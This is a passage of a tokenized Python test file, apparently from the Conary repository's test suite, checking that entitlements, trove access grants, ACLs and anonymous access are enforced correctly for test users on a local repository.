'<STR_LIT>' ) <EOL> def testExternalAuthChecks ( self ) : <EOL> rootLabel = versions . Label ( "<STR_LIT>" ) <EOL> self . stopRepository ( <NUM_LIT:0> ) <EOL> pwServer = AuthorizationServer ( PasswordHttpRequests ) <EOL> entServer = AuthorizationServer ( EntitlementRequests ) <EOL> try : <EOL> repos = self . openRepository ( authCheck = pwServer . url ( ) + '<STR_LIT>' , <EOL> entCheck = entServer . url ( ) + '<STR_LIT>' ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> self . 
setupUser ( repos , rootLabel , '<STR_LIT>' , '<STR_LIT>' , None , None ) <EOL> origEntClient = self . setupEntitlement ( repos , '<STR_LIT>' , '<STR_LIT>' , <EOL> rootLabel , None , None , <EOL> withClass = True ) [ <NUM_LIT:0> ] <EOL> pwClient = self . getRepositoryClient ( user = '<STR_LIT>' , <EOL> password = '<STR_LIT>' ) <EOL> pwClient . c [ '<STR_LIT:localhost>' ] . checkVersion ( ) <EOL> self . assertRaises ( errors . CannotChangePassword , <EOL> pwClient . changePassword , <EOL> rootLabel , '<STR_LIT>' , '<STR_LIT>' ) <EOL> pwClient = self . getRepositoryClient ( user = '<STR_LIT>' , <EOL> password = '<STR_LIT>' ) <EOL> self . assertRaises ( errors . InsufficientPermission , <EOL> pwClient . c . __getitem__ , '<STR_LIT:localhost>' ) <EOL> self . assertRaises ( errors . InsufficientPermission , <EOL> origEntClient . c . __getitem__ , '<STR_LIT:localhost>' ) <EOL> entClient = self . getEntitlementClient ( <EOL> [ ( '<STR_LIT:localhost>' , '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> withClass = True ) . getRepos ( ) <EOL> entClient . c [ '<STR_LIT:localhost>' ] . checkVersion ( ) <EOL> entClient = self . getEntitlementClient ( <EOL> [ ( '<STR_LIT:localhost>' , '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> withClass = False ) . getRepos ( ) <EOL> entClient . c [ '<STR_LIT:localhost>' ] . checkVersion ( ) <EOL> finally : <EOL> pwServer . kill ( ) <EOL> entServer . kill ( ) <EOL> self . stopRepository ( <NUM_LIT:0> ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testThreadedEntitlementUpdates ( self ) : <EOL> rootLabel = self . cfg . buildLabel <EOL> repos = self . openRepository ( ) <EOL> repos . deleteUserByName ( rootLabel , '<STR_LIT>' ) <EOL> self . cfg . threaded = True <EOL> origEntClient = self . setupEntitlement ( repos , '<STR_LIT>' , '<STR_LIT>' , <EOL> rootLabel , None , None , <EOL> onDisk = False ) [ <NUM_LIT:1> ] <EOL> self . cfg . threaded = False <EOL> self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . 
addCollection ( '<STR_LIT:foo>' , '<STR_LIT:1>' , [ '<STR_LIT>' ] ) <EOL> self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' , filePrimer = <NUM_LIT:1> ) <EOL> self . addCollection ( '<STR_LIT:bar>' , '<STR_LIT:1>' , [ '<STR_LIT>' ] ) <EOL> self . checkUpdate ( [ '<STR_LIT:foo>' , '<STR_LIT:bar>' ] , [ '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> client = origEntClient , apply = True ) <EOL> def testPermissionRevoked ( self ) : <EOL> self . openRepository ( <NUM_LIT:1> ) <EOL> tFoo = self . addComponent ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> tBar = self . addComponent ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> tBar1 = self . addComponent ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . updatePkg ( '<STR_LIT>' ) <EOL> repos = self . openRepository ( ) <EOL> repos . deleteUserByName ( versions . Label ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> limitedRepos = self . setupUser ( repos , <EOL> versions . Label ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , '<STR_LIT:bar>' , None , <EOL> versions . Label ( '<STR_LIT>' ) ) <EOL> self . assertRaises ( errors . InsufficientPermission , <EOL> limitedRepos . getTrove , <EOL> '<STR_LIT>' , tFoo . getVersion ( ) , tFoo . getFlavor ( ) ) <EOL> limitedRepos . createChangeSet ( [ <EOL> ( '<STR_LIT>' , ( tFoo . getVersion ( ) , tFoo . getFlavor ( ) ) , <EOL> ( tBar . getVersion ( ) , tBar . getFlavor ( ) ) , False ) ] ) <EOL> limitedRepos . createChangeSet ( [ <EOL> ( '<STR_LIT>' , ( tFoo . getVersion ( ) , tFoo . getFlavor ( ) ) , <EOL> ( tBar1 . getVersion ( ) , tBar1 . getFlavor ( ) ) , False ) ] ) <EOL> def testComplexRegexp ( self ) : <EOL> self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . addCollection ( '<STR_LIT:foo>' , '<STR_LIT:1>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . 
addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . addCollection ( '<STR_LIT:bar>' , '<STR_LIT:1>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> repos = self . getRepositoryClient ( ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> limitedRepos = self . setupUser ( repos , self . cfg . buildLabel , <EOL> '<STR_LIT>' , '<STR_LIT:bar>' , <EOL> '<STR_LIT>' , <EOL> self . cfg . buildLabel ) <EOL> assert ( sorted ( limitedRepos . troveNames ( self . cfg . buildLabel ) ) == <EOL> [ '<STR_LIT:bar>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:foo>' , '<STR_LIT>' ] ) <EOL> def testRecursiveGetChangeSetAcl ( self ) : <EOL> def _missing ( cs , name , trv ) : <EOL> trvCs = cs . getNewTroveVersion ( name , trv . getVersion ( ) , <EOL> trv . getFlavor ( ) ) <EOL> trv = trove . Trove ( trvCs ) <EOL> return trv . isMissing ( ) <EOL> repos = self . openRepository ( ) <EOL> self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> debug = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> trv = self . addCollection ( '<STR_LIT>' , '<STR_LIT:1>' , [ ( '<STR_LIT>' , True ) , <EOL> ( '<STR_LIT>' , False ) ] ) <EOL> label = versions . Label ( "<STR_LIT>" ) <EOL> self . addUserAndRole ( repos , label , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . deleteUserByName ( label , '<STR_LIT>' ) <EOL> repos . addAcl ( label , "<STR_LIT>" , "<STR_LIT>" , label ) <EOL> repos . addAcl ( label , "<STR_LIT>" , "<STR_LIT>" , label ) <EOL> self . addUserAndRole ( repos , self . cfg . buildLabel , '<STR_LIT>' , '<STR_LIT>' ) <EOL> ta = self . getRepositoryClient ( user = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> repos . addTroveAccess ( '<STR_LIT>' , [ trv . getNameVersionFlavor ( ) ] ) <EOL> limited = self . getRepositoryClient ( user = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> for rep in ( limited , ta ) : <EOL> cs = rep . createChangeSet ( [ ( '<STR_LIT>' , ( None , None ) , <EOL> ( trv . 
getVersion ( ) , trv . getFlavor ( ) ) , <EOL> True ) ] ) <EOL> if rep != ta : <EOL> assert ( _missing ( cs , '<STR_LIT>' , trv ) ) <EOL> assert ( not _missing ( cs , '<STR_LIT>' , trv ) ) <EOL> cs = rep . createChangeSet ( [ ( '<STR_LIT>' , ( None , None ) , <EOL> ( trv . getVersion ( ) , trv . getFlavor ( ) ) , <EOL> True ) ] ) <EOL> if rep != ta : <EOL> assert ( _missing ( cs , '<STR_LIT>' , trv ) ) <EOL> assert ( not _missing ( cs , '<STR_LIT>' , trv ) ) <EOL> cs = repos . createChangeSet ( [ ( '<STR_LIT>' , ( None , None ) , <EOL> ( trv . getVersion ( ) , trv . getFlavor ( ) ) , <EOL> True ) ] ) <EOL> assert ( not _missing ( cs , '<STR_LIT>' , trv ) ) <EOL> assert ( not _missing ( cs , '<STR_LIT>' , trv ) ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testMultipleEntitlements ( self ) : <EOL> repos = self . openRepository ( ) <EOL> runtime = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> lib = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> runtimeEnt = self . setupEntitlement ( repos , '<STR_LIT>' , '<STR_LIT>' , <EOL> self . cfg . buildLabel , '<STR_LIT>' , <EOL> None , withClass = True , <EOL> onDisk = False ) [ <NUM_LIT:0> ] <EOL> libEnt = self . setupEntitlement ( repos , '<STR_LIT>' , '<STR_LIT>' , <EOL> self . cfg . buildLabel , '<STR_LIT>' , <EOL> None , withClass = True , <EOL> onDisk = False ) [ <NUM_LIT:0> ] <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> self . assertRaises ( errors . InsufficientPermission , runtimeEnt . getTrove , <EOL> * lib . getNameVersionFlavor ( ) ) <EOL> self . assertRaises ( errors . InsufficientPermission , libEnt . getTrove , <EOL> * runtime . getNameVersionFlavor ( ) ) <EOL> mixed = self . getEntitlementClient ( <EOL> [ ( '<STR_LIT:*>' , None , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:localhost>' , None , '<STR_LIT>' ) ] , onDisk = False ) . getRepos ( ) <EOL> mixed . getTroves ( [ runtime . getNameVersionFlavor ( ) , <EOL> lib . 
getNameVersionFlavor ( ) ] ) <EOL> duplicate = self . getEntitlementClient ( <EOL> [ ( '<STR_LIT:localhost>' , None , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:localhost>' , None , '<STR_LIT>' ) ] , onDisk = False ) . getRepos ( ) <EOL> duplicate . getTroves ( [ runtime . getNameVersionFlavor ( ) , <EOL> lib . getNameVersionFlavor ( ) ] ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testAnonymousAccess ( self ) : <EOL> repos = self . openRepository ( ) <EOL> runtime = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> lib = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> repos . deleteRole ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> anonUser = self . setupUser ( repos , self . cfg . buildLabel , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , None ) <EOL> runtimeUser = self . setupUser ( repos , self . cfg . buildLabel , '<STR_LIT:user>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , None ) <EOL> repos . setRoleCanMirror ( self . cfg . buildLabel , '<STR_LIT>' , False ) <EOL> repos . setRoleCanMirror ( self . cfg . buildLabel , '<STR_LIT:user>' , False ) <EOL> assert ( runtimeUser . hasTrove ( * lib . getNameVersionFlavor ( ) ) ) <EOL> assert ( runtimeUser . hasTrove ( * runtime . getNameVersionFlavor ( ) ) ) <EOL> repos . setRoleCanMirror ( self . cfg . buildLabel , '<STR_LIT:user>' , True ) <EOL> assert ( runtimeUser . hasTrove ( * runtime . getNameVersionFlavor ( ) ) ) <EOL> assert ( not runtimeUser . hasTrove ( * lib . getNameVersionFlavor ( ) ) ) <EOL> repos . setRoleCanMirror ( self . cfg . buildLabel , '<STR_LIT:user>' , False ) <EOL> repos . addRole ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> repos . setRoleCanMirror ( self . cfg . buildLabel , '<STR_LIT>' , True ) <EOL> repos . updateRoleMembers ( self . cfg . buildLabel , '<STR_LIT>' , [ '<STR_LIT:user>' ] ) <EOL> assert ( runtimeUser . hasTrove ( * runtime . getNameVersionFlavor ( ) ) ) <EOL> assert ( not runtimeUser . 
hasTrove ( * lib . getNameVersionFlavor ( ) ) ) <EOL> def testNonAnonymousAccess ( self ) : <EOL> repos = self . openRepository ( ) <EOL> user = self . setupUser ( repos , self . cfg . buildLabel , '<STR_LIT:user>' , '<STR_LIT>' , <EOL> None , None ) <EOL> badUser = self . getRepositoryClient ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> self . assertRaises ( errors . InsufficientPermission , <EOL> badUser . changePassword , '<STR_LIT:localhost>' , '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testDynamicEntitlementDir ( self ) : <EOL> repos = self . openRepository ( ) <EOL> runtime = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> self . setupEntitlement ( repos , "<STR_LIT>" , "<STR_LIT>" , self . cfg . buildLabel , <EOL> None , None , withClass = True ) [ <NUM_LIT:0> ] <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> cfg = copy . copy ( self . cfg ) <EOL> cfg . resetToDefault ( '<STR_LIT:user>' ) <EOL> cfg . entitlementDirectory = self . workDir <EOL> anonClient = netclient . NetworkRepositoryClient ( cfg ) <EOL> open ( self . workDir + "<STR_LIT>" , "<STR_LIT:w>" ) . write ( <EOL> conarycfg . emitEntitlement ( '<STR_LIT:localhost>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> assert ( anonClient . hasTrove ( * runtime . getNameVersionFlavor ( ) ) ) <EOL> def _entitlementTimeouts ( self , RequestClass , authCacheTimeout = <NUM_LIT:0> ) : <EOL> self . stopRepository ( <NUM_LIT:0> ) <EOL> entClient = self . getEntitlementClient ( <EOL> [ ( '<STR_LIT:localhost>' , None , '<STR_LIT>' ) ] , <EOL> withClass = False , onDisk = True ) . getRepos ( ) <EOL> entServer = AuthorizationServer ( RequestClass ) <EOL> try : <EOL> repos = self . openRepository ( <EOL> entCheck = entServer . url ( ) + '<STR_LIT>' , <EOL> authTimeout = authCacheTimeout , <EOL> singleWorker = True , <EOL> ) <EOL> self . setupEntitlement ( repos , '<STR_LIT>' , '<STR_LIT>' , self . cfg . 
buildLabel , <EOL> None , None , onDisk = False ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> entClient . c [ '<STR_LIT:localhost>' ] <EOL> self . sleep ( <NUM_LIT> ) <EOL> self . assertRaises ( errors . InsufficientPermission , <EOL> entClient . c [ '<STR_LIT:localhost>' ] . checkVersion ) <EOL> entServer . kill ( ) <EOL> entServer . start ( ) <EOL> entClient . c [ '<STR_LIT:localhost>' ] . checkVersion ( ) <EOL> f = open ( self . workDir + '<STR_LIT>' , '<STR_LIT:w>' ) <EOL> f . write ( conarycfg . emitEntitlement ( '<STR_LIT:localhost>' , <EOL> className = '<STR_LIT>' , <EOL> key = '<STR_LIT>' ) ) <EOL> f . close ( ) <EOL> self . sleep ( <NUM_LIT:1> ) <EOL> entClient . c [ '<STR_LIT:localhost>' ] . checkVersion ( ) <EOL> finally : <EOL> entServer . kill ( ) <EOL> self . stopRepository ( <NUM_LIT:0> ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testEntitlementTimeouts ( self ) : <EOL> self . _entitlementTimeouts ( OneTimeEntitlementRequests , <EOL> authCacheTimeout = <NUM_LIT:1> ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testPerEntitlementTimeouts ( self ) : <EOL> self . _entitlementTimeouts ( OneTimeEntitlementRequestsInternalTimeout , <EOL> authCacheTimeout = <NUM_LIT:0> ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testEntitlementAutoRetry ( self ) : <EOL> self . stopRepository ( <NUM_LIT:0> ) <EOL> entClient = self . getEntitlementClient ( <EOL> [ ( '<STR_LIT:localhost>' , None , '<STR_LIT>' ) ] , <EOL> withClass = False , onDisk = True ) . getRepos ( ) <EOL> entServer = AuthorizationServer ( RetryEntitlementRequests ) <EOL> try : <EOL> repos = self . openRepository ( entCheck = entServer . url ( ) + '<STR_LIT>' , <EOL> authTimeout = <NUM_LIT:1> ) <EOL> self . setupEntitlement ( repos , '<STR_LIT>' , '<STR_LIT>' , self . cfg . buildLabel , <EOL> None , None , onDisk = False ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> entClient . 
c [ '<STR_LIT:localhost>' ] <EOL> self . sleep ( <NUM_LIT:1> ) <EOL> entClient . c . entitlements . append ( ( '<STR_LIT:localhost>' , ( None , None ) ) ) <EOL> self . mock ( conarycfg , '<STR_LIT>' , <EOL> lambda * args , ** kwargs : <NUM_LIT:1> / <NUM_LIT:0> ) <EOL> entClient . c [ '<STR_LIT:localhost>' ] . checkVersion ( ) <EOL> finally : <EOL> entServer . kill ( ) <EOL> self . stopRepository ( <NUM_LIT:0> ) <EOL> def testOldAclCalls ( self ) : <EOL> repos = self . openRepository ( ) <EOL> repos . c [ '<STR_LIT:localhost>' ] . setProtocolVersion ( <NUM_LIT> ) <EOL> self . assertRaises ( errors . InvalidServerVersion , <EOL> repos . addAcl , self . cfg . buildLabel , '<STR_LIT:test>' , [ ] , [ ] ) <EOL> try : <EOL> repos . c [ '<STR_LIT:localhost>' ] . addAcl ( <NUM_LIT> ) <EOL> except errors . InvalidClientVersion , e : <EOL> assert ( str ( e ) == '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> else : <EOL> assert ( False ) <EOL> self . assertRaises ( errors . InvalidServerVersion , <EOL> repos . editAcl , self . cfg . buildLabel , '<STR_LIT:test>' , [ ] , [ ] , <EOL> False , False ) <EOL> try : <EOL> repos . c [ '<STR_LIT:localhost>' ] . editAcl ( <NUM_LIT> ) <EOL> except errors . InvalidClientVersion , e : <EOL> assert ( str ( e ) == '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> else : <EOL> assert ( False ) <EOL> def testTroveAccess ( self ) : <EOL> repos = self . openRepository ( ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> comp = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1.0>' ) <EOL> pkg = self . addCollection ( '<STR_LIT:foo>' , '<STR_LIT:1.0>' , [ '<STR_LIT>' ] ) <EOL> grp = self . addCollection ( '<STR_LIT>' , '<STR_LIT:1.0>' , [ '<STR_LIT:foo>' ] ) <EOL> comp1 = self . addComponent ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> comp1 = self . addComponent ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> pkg1 = self . addCollection ( "<STR_LIT:bar>" , "<STR_LIT>" , [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> grp1 = self . 
addCollection ( "<STR_LIT>" , "<STR_LIT>" , [ ( "<STR_LIT:bar>" , "<STR_LIT>" ) ] ) <EOL> grp2 = self . addCollection ( "<STR_LIT>" , "<STR_LIT>" , [ ( "<STR_LIT:foo>" , "<STR_LIT:1.0>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) ] ) <EOL> self . addUserAndRole ( repos , self . cfg . buildLabel , '<STR_LIT:user>' , '<STR_LIT:user>' ) <EOL> userClient = self . getRepositoryClient ( user = '<STR_LIT:user>' , password = '<STR_LIT:user>' ) <EOL> self . addUserAndRole ( repos , self . cfg . buildLabel , '<STR_LIT>' , '<STR_LIT>' ) <EOL> repos . setRoleCanMirror ( self . cfg . buildLabel , '<STR_LIT>' , True ) <EOL> mirrorClient = self . getRepositoryClient ( user = '<STR_LIT>' , <EOL> password = '<STR_LIT>' ) <EOL> self . addUserAndRole ( repos , self . cfg . buildLabel , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert ( not userClient . hasTrove ( * comp . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * comp1 . getNameVersionFlavor ( ) ) ) <EOL> repos . addTroveAccess ( '<STR_LIT:user>' , [ comp . getNameVersionFlavor ( ) ] ) <EOL> repos . addTroveAccess ( '<STR_LIT>' , [ comp . getNameVersionFlavor ( ) ] ) <EOL> repos . addTroveAccess ( '<STR_LIT>' , [ comp . getNameVersionFlavor ( ) ] ) <EOL> assert ( userClient . hasTrove ( * comp . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * comp1 . getNameVersionFlavor ( ) ) ) <EOL> self . assertEqual ( userClient . troveNames ( self . cfg . buildLabel ) , <EOL> [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( userClient . hasTroves ( [ <EOL> pkg . getNameVersionFlavor ( ) , grp . getNameVersionFlavor ( ) ] ) . values ( ) , <EOL> [ False , False ] ) <EOL> repos . addTroveAccess ( '<STR_LIT:user>' , [ grp . getNameVersionFlavor ( ) ] ) <EOL> repos . addTroveAccess ( '<STR_LIT>' , [ grp . getNameVersionFlavor ( ) ] ) <EOL> self . assertEqual ( userClient . hasTroves ( [ <EOL> pkg . getNameVersionFlavor ( ) , grp . getNameVersionFlavor ( ) ] ) . 
values ( ) , <EOL> [ True , True ] ) <EOL> self . assertEqual ( userClient . hasTroves ( [ <EOL> pkg1 . getNameVersionFlavor ( ) , grp1 . getNameVersionFlavor ( ) , grp2 . getNameVersionFlavor ( ) , <EOL> ] ) . values ( ) , [ False , False , False ] ) <EOL> self . assertEqual ( sorted ( userClient . troveNames ( self . cfg . buildLabel ) ) , <EOL> [ '<STR_LIT:foo>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( sorted ( repos . listTroveAccess ( '<STR_LIT:localhost>' , '<STR_LIT:user>' ) ) , <EOL> [ comp . getNameVersionFlavor ( ) , grp . getNameVersionFlavor ( ) ] ) <EOL> expectNewTroves = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:foo>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] <EOL> newTroves = mirrorClient . getNewTroveList ( '<STR_LIT:localhost>' , <NUM_LIT:0> ) <EOL> newTroves = [ ( x [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] , str ( x [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] ) ) for x in newTroves ] <EOL> self . assertEqual ( sorted ( newTroves ) , sorted ( expectNewTroves ) ) <EOL> repos . deleteTroveAccess ( '<STR_LIT:user>' , [ comp . getNameVersionFlavor ( ) ] ) <EOL> self . assertEqual ( sorted ( repos . listTroveAccess ( '<STR_LIT:localhost>' , '<STR_LIT:user>' ) ) , <EOL> [ grp . getNameVersionFlavor ( ) ] ) <EOL> assert ( userClient . hasTrove ( * comp . getNameVersionFlavor ( ) ) ) <EOL> repos . deleteTroveAccess ( '<STR_LIT:user>' , [ pkg . getNameVersionFlavor ( ) ] ) <EOL> repos . deleteTroveAccess ( '<STR_LIT:user>' , [ grp . getNameVersionFlavor ( ) ] ) <EOL> self . assertEqual ( repos . listTroveAccess ( '<STR_LIT:localhost>' , '<STR_LIT:user>' ) , [ ] ) <EOL> self . assertEqual ( userClient . hasTroves ( [ <EOL> pkg . getNameVersionFlavor ( ) , grp . getNameVersionFlavor ( ) ] ) . values ( ) , <EOL> [ False , False ] ) <EOL> self . assertEqual ( userClient . troveNames ( self . cfg . buildLabel ) , [ ] ) <EOL> def testSimpleCommitsWithFiles ( self ) : <EOL> bl = self . cfg . buildLabel <EOL> repos = self . 
openRepository ( ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> self . addUserAndRole ( repos , self . cfg . buildLabel , '<STR_LIT:user>' , '<STR_LIT:user>' ) <EOL> userClient = self . getRepositoryClient ( user = '<STR_LIT:user>' , password = '<STR_LIT:user>' ) <EOL> repos . addAcl ( bl , "<STR_LIT:user>" , '<STR_LIT>' , bl ) <EOL> trv = self . addComponent ( '<STR_LIT>' , <NUM_LIT:1> , fileContents = [ <EOL> ( '<STR_LIT>' % i , '<STR_LIT>' % ( i , ) ) <EOL> for i in range ( <NUM_LIT:5> ) ] ) <EOL> ret1 = repos . getTroveVersionList ( "<STR_LIT:localhost>" , { "<STR_LIT>" : None } ) <EOL> trv1 = repos . getTrove ( * trv . getNameVersionFlavor ( ) ) <EOL> ret2 = userClient . getTroveVersionList ( "<STR_LIT:localhost>" , { "<STR_LIT>" : None } ) <EOL> trv2 = userClient . getTrove ( * trv . getNameVersionFlavor ( ) ) <EOL> self . assertEqual ( ret1 , ret2 ) <EOL> self . assertEqual ( trv1 , trv2 ) <EOL> def testTroveAccessSimple ( self ) : <EOL> repos = self . openRepository ( ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> self . addUserAndRole ( repos , self . cfg . buildLabel , '<STR_LIT:user>' , '<STR_LIT:user>' ) <EOL> userClient = self . getRepositoryClient ( user = '<STR_LIT:user>' , password = '<STR_LIT:user>' ) <EOL> compa = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> compb = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> compc = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> pkga = self . addCollection ( '<STR_LIT:a>' , '<STR_LIT:1>' , [ '<STR_LIT>' ] ) <EOL> pkgb = self . addCollection ( '<STR_LIT:b>' , '<STR_LIT:1>' , [ '<STR_LIT>' ] ) <EOL> pkgc = self . addCollection ( '<STR_LIT:c>' , '<STR_LIT:1>' , [ '<STR_LIT>' ] ) <EOL> grp1 = self . addCollection ( '<STR_LIT>' , '<STR_LIT:1>' , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> grp2 = self . addCollection ( '<STR_LIT>' , '<STR_LIT:1>' , [ '<STR_LIT:b>' , '<STR_LIT:c>' ] ) <EOL> assert ( not userClient . 
hasTrove ( * compa . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * pkga . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * grp1 . getNameVersionFlavor ( ) ) ) <EOL> repos . addTroveAccess ( '<STR_LIT:user>' , [ pkga . getNameVersionFlavor ( ) ] ) <EOL> assert ( userClient . hasTrove ( * compa . getNameVersionFlavor ( ) ) ) <EOL> assert ( userClient . hasTrove ( * pkga . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * pkgb . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * pkgc . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * grp1 . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * grp2 . getNameVersionFlavor ( ) ) ) <EOL> repos . addTroveAccess ( '<STR_LIT:user>' , [ grp1 . getNameVersionFlavor ( ) ] ) <EOL> assert ( userClient . hasTrove ( * pkga . getNameVersionFlavor ( ) ) ) <EOL> assert ( userClient . hasTrove ( * pkgb . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * pkgc . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * grp2 . getNameVersionFlavor ( ) ) ) <EOL> repos . deleteTroveAccess ( '<STR_LIT:user>' , [ pkga . getNameVersionFlavor ( ) ] ) <EOL> assert ( userClient . hasTrove ( * pkga . getNameVersionFlavor ( ) ) ) <EOL> assert ( userClient . hasTrove ( * pkgb . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * pkgc . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * grp2 . getNameVersionFlavor ( ) ) ) <EOL> repos . addTroveAccess ( '<STR_LIT:user>' , [ grp2 . getNameVersionFlavor ( ) ] ) <EOL> assert ( userClient . hasTrove ( * pkgc . getNameVersionFlavor ( ) ) ) <EOL> assert ( userClient . hasTrove ( * grp2 . getNameVersionFlavor ( ) ) ) <EOL> repos . deleteTroveAccess ( '<STR_LIT:user>' , [ grp1 . getNameVersionFlavor ( ) ] ) <EOL> assert ( not userClient . hasTrove ( * compa . 
getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * pkga . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * grp1 . getNameVersionFlavor ( ) ) ) <EOL> assert ( userClient . hasTrove ( * pkgc . getNameVersionFlavor ( ) ) ) <EOL> assert ( userClient . hasTrove ( * pkgb . getNameVersionFlavor ( ) ) ) <EOL> assert ( userClient . hasTrove ( * grp2 . getNameVersionFlavor ( ) ) ) <EOL> repos . addTroveAccess ( '<STR_LIT:user>' , [ compc . getNameVersionFlavor ( ) ] ) <EOL> repos . deleteTroveAccess ( '<STR_LIT:user>' , [ grp2 . getNameVersionFlavor ( ) ] ) <EOL> for x in [ compa , compb , pkga , pkgb , pkgc , grp1 , grp2 ] : <EOL> assert ( not userClient . hasTrove ( * x . getNameVersionFlavor ( ) ) ) <EOL> assert ( userClient . hasTrove ( * compc . getNameVersionFlavor ( ) ) ) <EOL> self . addUserAndRole ( repos , self . cfg . buildLabel , '<STR_LIT>' , '<STR_LIT:user>' ) <EOL> user2Client = self . getRepositoryClient ( user = '<STR_LIT>' , password = '<STR_LIT:user>' ) <EOL> for x in [ compa , compb , compc , pkga , pkgb , pkgc , grp1 , grp2 ] : <EOL> assert ( not user2Client . hasTrove ( * x . getNameVersionFlavor ( ) ) ) <EOL> repos . addTroveAccess ( '<STR_LIT:user>' , [ grp1 . getNameVersionFlavor ( ) ] ) <EOL> repos . addTroveAccess ( '<STR_LIT>' , [ grp2 . getNameVersionFlavor ( 